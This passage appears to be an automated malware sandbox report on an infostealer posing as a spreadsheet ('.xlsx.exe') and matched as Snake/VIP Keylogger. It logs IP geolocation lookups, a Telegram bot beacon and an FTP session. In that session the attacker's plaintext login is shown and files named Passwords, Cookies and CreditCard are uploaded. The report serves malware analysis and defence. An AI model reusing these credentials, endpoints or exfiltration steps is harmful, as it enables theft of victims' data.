Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
Timestamp: 2024-07-17 12:17:08 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: 2024-07-17 12:17:10 UTC | Bytes transferred: 84 | Direction: OUT | Data:
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-07-17 12:17:10 UTC | Bytes transferred: 710 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:10 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 52988
Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gX4Ik%2FLREQwhf3M7J51osrR6KGyjzwZTgLV63sPENHJy1wTLycV8Pd84mlMcxfMNMhs%2FqZcNLovHkK9cSaYjLcxBgJDlfHFVv34%2BDHawMTImJTGXVvOLGDZMt%2FA%2FrcNFbKYMULNy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a4a2ad6cdd73342-EWR
alt-svc: h3=":443"; ma=86400
Timestamp: 2024-07-17 12:17:10 UTC | Bytes transferred: 340 | Direction: IN | Data:
Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
Timestamp: 2024-07-17 12:17:10 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.4 | 49747 | 188.114.97.3 | 443 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-07-17 12:17:11 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-07-17 12:17:11 UTC | 716 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:11 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52989
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEjPgkGFxvc85YSPaOWCZ2wgc5Xup3xuE0kN%2BvmOgMarh%2B%2BIUsXDrXiNwz%2FG3fap%2B%2Bw540R7%2BuTmZqWYHXZjUFMltlgnk8Cy7zVQYb1LeIRMScNu1FxxZrXQOtC7dZ96JOh4%2FRYb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2addaa870cc1-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:11 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-07-17 12:17:12 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:12 UTC | 704 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:12 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52990
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y0gG7qdA0KmDCXeXCdQhmDu%2BVUZWwiNTPESRor94zKa3NYjLA9TjTDCPhOktIQGdad5jK4VQlknCPePIO3d2jokch9vkB0btoq15wYb3P%2FBXswkO45ueS7soVxRLBGHJQkUJUUcP"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2ae47e511a30-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:12 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-07-17 12:17:13 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:13 UTC | 704 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 17 Jul 2024 12:17:13 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 52991
                                                    Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvwN%2BcpMuE52VPOBINtl4mhc5Vneb5%2Fjb7mEBEf1QXGPC5KIAlzCZBPbvNWeGvsMiLwSfKaOepRYreKNOdecvJewdpiPs6QwfubgTYMX729uPImJsWx0F6OiOEHHGfGwGx1wZmol"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8a4a2aed780a4307-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-17 12:17:13 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-07-17 12:17:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.4 | 49752 | 149.154.167.220 | 443 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-07-17 12:17:14 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                    Host: api.telegram.org
                                                    Connection: Keep-Alive
                                                    2024-07-17 12:17:14 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx/1.18.0
                                                    Date: Wed, 17 Jul 2024 12:17:14 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 55
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                    2024-07-17 12:17:14 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                    Jul 17, 2024 14:17:21.064588070 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                    220-You are user number 19 of 150 allowed.
                                                    220-Local time is now 14:17. Server port: 21.
                                                    220-This is a private system - No anonymous login
                                                    220 You will be disconnected after 15 minutes of inactivity.
                                                    Jul 17, 2024 14:17:21.064830065 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | USER f2243_axaabu
                                                    Jul 17, 2024 14:17:21.257766008 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 331 User f2243_axaabu OK. Password required
                                                    Jul 17, 2024 14:17:21.258104086 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | PASS Realak980#
                                                    Jul 17, 2024 14:17:21.524398088 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 230 OK. Current restricted directory is /
                                                    Jul 17, 2024 14:17:21.714761972 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 504 Unknown command
                                                    Jul 17, 2024 14:17:21.714934111 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | PWD
                                                    Jul 17, 2024 14:17:21.904567957 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 257 "/" is your current location
                                                    Jul 17, 2024 14:17:21.904773951 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | TYPE I
                                                    Jul 17, 2024 14:17:22.450741053 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                    Jul 17, 2024 14:17:22.450953007 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | PASV
                                                    Jul 17, 2024 14:17:22.451524973 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                    Jul 17, 2024 14:17:22.642566919 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 227 Entering Passive Mode (213,189,52,181,250,212)
                                                    Jul 17, 2024 14:17:22.648998976 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | STOR xlxabu562258 - Passwords ID - ZyiAEnXWZP1822138434.txt
                                                    Jul 17, 2024 14:17:23.204821110 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 150 Accepted data connection
                                                    Jul 17, 2024 14:17:23.420774937 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 226-File successfully transferred
                                                    226 0.204 seconds (measured here), 1.64 Kbytes per second
                                                    Jul 17, 2024 14:17:24.930371046 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | PASV
                                                    Jul 17, 2024 14:17:25.396604061 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 227 Entering Passive Mode (213,189,52,181,250,119)
                                                    Jul 17, 2024 14:17:25.398139954 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 227 Entering Passive Mode (213,189,52,181,250,119)
                                                    Jul 17, 2024 14:17:25.402735949 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | STOR xlxabu562258 - Cookies ID - ZyiAEnXWZP1822138434.txt
                                                    Jul 17, 2024 14:17:25.970232964 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 150 Accepted data connection
                                                    Jul 17, 2024 14:17:26.328495979 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 226-File successfully transferred
                                                    226 0.198 seconds (measured here), 33.49 Kbytes per second
                                                    Jul 17, 2024 14:17:27.837539911 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | PASV
                                                    Jul 17, 2024 14:17:28.034118891 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 227 Entering Passive Mode (213,189,52,181,246,38)
                                                    Jul 17, 2024 14:17:28.039921999 CEST | 49756 | 21 | 192.168.2.4 | 213.189.52.181 | STOR xlxabu562258 - CreditCard ID - ZyiAEnXWZP1822138434.txt
                                                    Jul 17, 2024 14:17:28.701682091 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 150 Accepted data connection
                                                    Jul 17, 2024 14:17:28.901737928 CEST | 21 | 49756 | 213.189.52.181 | 192.168.2.4 | 226-File successfully transferred
                                                    226 0.300 seconds (measured here), 1.14 Kbytes per second


                                                    Target ID:0
                                                    Start time:08:17:00
                                                    Start date:17/07/2024
                                                    Path:C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                                                    Imagebase:0x9c0000
                                                    File size:739'328 bytes
                                                    MD5 hash:6FD5C95F3BC8AC876F1BABED1B839DCD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:08:17:00
                                                    Start date:17/07/2024
                                                    Path:C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                                                    Imagebase:0x40000
                                                    File size:739'328 bytes
                                                    MD5 hash:6FD5C95F3BC8AC876F1BABED1B839DCD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false


                                                      Execution Graph

                                                      Execution Coverage:8.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:43
                                                      Total number of Limit Nodes:8
                                                      execution_graph 25226 723ae88 25227 723b013 25226->25227 25228 723aeae 25226->25228 25228->25227 25230 7239014 25228->25230 25231 723b108 PostMessageW 25230->25231 25232 723b174 25231->25232 25232->25228 25233 2b5a598 25237 2b5a690 25233->25237 25245 2b5a680 25233->25245 25234 2b5a5a7 25238 2b5a6a1 25237->25238 25239 2b5a6c4 25237->25239 25238->25239 25253 2b5a928 25238->25253 25257 2b5a91a 25238->25257 25239->25234 25240 2b5a6bc 25240->25239 25241 2b5a8c8 GetModuleHandleW 25240->25241 25242 2b5a8f5 25241->25242 25242->25234 25246 2b5a6a1 25245->25246 25248 2b5a6c4 25245->25248 25246->25248 25251 2b5a928 LoadLibraryExW 25246->25251 25252 2b5a91a LoadLibraryExW 25246->25252 25247 2b5a6bc 25247->25248 25249 2b5a8c8 GetModuleHandleW 25247->25249 25248->25234 25250 2b5a8f5 25249->25250 25250->25234 25251->25247 25252->25247 25254 2b5a93c 25253->25254 25255 2b5a961 25254->25255 25261 2b5a118 25254->25261 25255->25240 25258 2b5a93c 25257->25258 25259 2b5a961 25258->25259 25260 2b5a118 LoadLibraryExW 25258->25260 25259->25240 25260->25259 25262 2b5ab08 LoadLibraryExW 25261->25262 25264 2b5ab81 25262->25264 25264->25255 25265 2b5c918 25266 2b5c95e 25265->25266 25267 2b5ca4b 25266->25267 25270 2b5cae9 25266->25270 25273 2b5caf8 25266->25273 25272 2b5cb26 25270->25272 25276 2b5bde0 25270->25276 25272->25267 25274 2b5bde0 DuplicateHandle 25273->25274 25275 2b5cb26 25274->25275 25275->25267 25277 2b5cb60 DuplicateHandle 25276->25277 25278 2b5cbf6 25277->25278 25278->25272

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 529 2b5a690-2b5a69f 530 2b5a6a1-2b5a6ae call 2b586ac 529->530 531 2b5a6cb-2b5a6cf 529->531 538 2b5a6c4 530->538 539 2b5a6b0 530->539 532 2b5a6d1-2b5a6db 531->532 533 2b5a6e3-2b5a724 531->533 532->533 540 2b5a726-2b5a72e 533->540 541 2b5a731-2b5a73f 533->541 538->531 584 2b5a6b6 call 2b5a928 539->584 585 2b5a6b6 call 2b5a91a 539->585 540->541 543 2b5a741-2b5a746 541->543 544 2b5a763-2b5a765 541->544 542 2b5a6bc-2b5a6be 542->538 545 2b5a800-2b5a8c0 542->545 547 2b5a751 543->547 548 2b5a748-2b5a74f call 2b5a0bc 543->548 546 2b5a768-2b5a76f 544->546 579 2b5a8c2-2b5a8c5 545->579 580 2b5a8c8-2b5a8f3 GetModuleHandleW 545->580 550 2b5a771-2b5a779 546->550 551 2b5a77c-2b5a783 546->551 549 2b5a753-2b5a761 547->549 548->549 549->546 550->551 554 2b5a785-2b5a78d 551->554 555 2b5a790-2b5a799 call 2b5a0cc 551->555 554->555 560 2b5a7a6-2b5a7ab 555->560 561 2b5a79b-2b5a7a3 555->561 562 2b5a7ad-2b5a7b4 560->562 563 2b5a7c9-2b5a7d6 560->563 561->560 562->563 565 2b5a7b6-2b5a7c6 call 2b5a0dc call 2b5a0ec 562->565 570 2b5a7f9-2b5a7ff 563->570 571 2b5a7d8-2b5a7f6 563->571 565->563 571->570 579->580 581 2b5a8f5-2b5a8fb 580->581 582 2b5a8fc-2b5a910 580->582 581->582 584->542 585->542
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02B5A8E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: e5d4063b10d9e62627f7fd8fc16be9bc1f28e2ca8430484c22b5dcd712737d90
                                                      • Instruction ID: 576ba3ad74b39b829722e4037378cb64c20b2c1e7b577b4dee488b4359fe645c
                                                      • Opcode Fuzzy Hash: e5d4063b10d9e62627f7fd8fc16be9bc1f28e2ca8430484c22b5dcd712737d90
                                                      • Instruction Fuzzy Hash: CC7123B0A00B158FD724DF29D15475ABBF1FF48304F108A6ED88AEBA50DB74E945CB90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 592 2b5cb58-2b5cb5b 593 2b5cb60-2b5cbf4 DuplicateHandle 592->593 594 2b5cbf6-2b5cbfc 593->594 595 2b5cbfd-2b5cc1a 593->595 594->595
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5CB26,?,?,?,?,?), ref: 02B5CBE7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 7cbc093a41da292bd1e97fc5e39436092dd136bbf766d593fcee1f9a0c1b1f21
                                                      • Instruction ID: 8ea52f79d053a311ff8aae077d96b30072ae452ff1e1f0460c5691134be65f70
                                                      • Opcode Fuzzy Hash: 7cbc093a41da292bd1e97fc5e39436092dd136bbf766d593fcee1f9a0c1b1f21
                                                      • Instruction Fuzzy Hash: AC2103B5900308AFDB10CFAAD985ADEBFF5EB48310F14845AE918A3350D378A944CFA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 586 2b5bde0-2b5cbf4 DuplicateHandle 588 2b5cbf6-2b5cbfc 586->588 589 2b5cbfd-2b5cc1a 586->589 588->589
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B5CB26,?,?,?,?,?), ref: 02B5CBE7
                                                      Memory Dump Source
